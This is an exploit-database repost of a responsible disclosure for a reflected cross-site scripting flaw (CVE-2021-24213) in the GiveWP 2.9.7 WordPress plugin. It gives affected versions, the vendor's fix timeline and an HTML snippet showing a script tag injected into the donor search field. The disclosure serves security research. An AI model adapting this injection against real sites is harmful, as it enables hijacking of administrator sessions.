WordPress GiveWP 2.9.7 Cross Site Scripting

CVE Category Price Severity
CVE-2021-24213 CWE-79 Unknown High
Author Risk Exploitation Type Date
ExploitAlert Team High Remote 2021-03-24
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

WordPress GiveWP 2.9.7 Cross Site Scripting
# Exploit Title: GiveWP 2.9.7 Reflected Cross-Site Scripting
# Date: 3/23/2021
# Exploit Author: Austin Bentley
# Vendor Homepage:
# Software Link:
# Version: 2.9.7
# Tested on: Windows 7
# CVE: CVE-2021-24213
Exploitation requirements: Admin must visit payload URL. Default config.
Tested on: GiveWP 2.9.7, Wordpress 5.7, XAMPP 7.4.16, Firefox 86.0.1. Default configs on all products.
Vulnerable since: 2.4.0, Jan 16th 2019, commit 097c4d0ab964493776950381ed64498040395f6b
Active Installations: 100,000+ per
Researcher: Austin Bentley (
Detailed writeup available at httpS://


--- SNIP ---
<div class="give-donor-search-box">
<input type="text" id="give-donors-search-input" placeholder="Name, Email, or Donor ID" name="s" value="\"><script>alert(0)</script>">
<input type="submit" class="button" value="Search" ID="donor-search-submit"  />
--- SNIP ---

Disclosure Log:
3/21/2021 -- Emailed GiveWP for security contact information
3/22/2021 -- WPScan CNA issued CVE-2021-24213 (un-released)
3/22/2021 -- Provided vendor with PoC
3/22/2021 -- Vendor provided fix in 2.10.0
3/23/2021 -- Fix validated, article posted, CVE unlocked

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum